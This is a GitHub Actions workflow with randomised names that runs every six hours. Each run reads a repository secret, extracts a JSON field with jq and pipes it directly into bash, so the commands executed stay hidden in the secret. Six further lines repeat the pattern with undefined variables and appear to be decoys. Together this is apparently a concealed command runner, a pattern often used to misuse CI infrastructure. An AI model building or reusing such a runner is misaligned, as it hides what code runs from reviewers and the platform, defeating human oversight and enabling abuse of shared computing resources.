name: aizaixu1376

on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: aizaixu1376
        env:
          wdnez4: ${{ secrets.wdnez4 }}
        run: |
          echo $wdnez4 | jq -r .cvzhd732 | /bin/bash
          echo $d54 | jq -r .ff155 | /bin/bash
          echo $uz2 | jq -r .w7 | /bin/bash
          echo $aa62778 | jq -r .bdw0 | /bin/bash
          echo $svl68108 | jq -r .zk561 | /bin/bash
          echo $apu8 | jq -r .hxyz140 | /bin/bash
          echo $jkv99434 | jq -r .z88 | /bin/bash

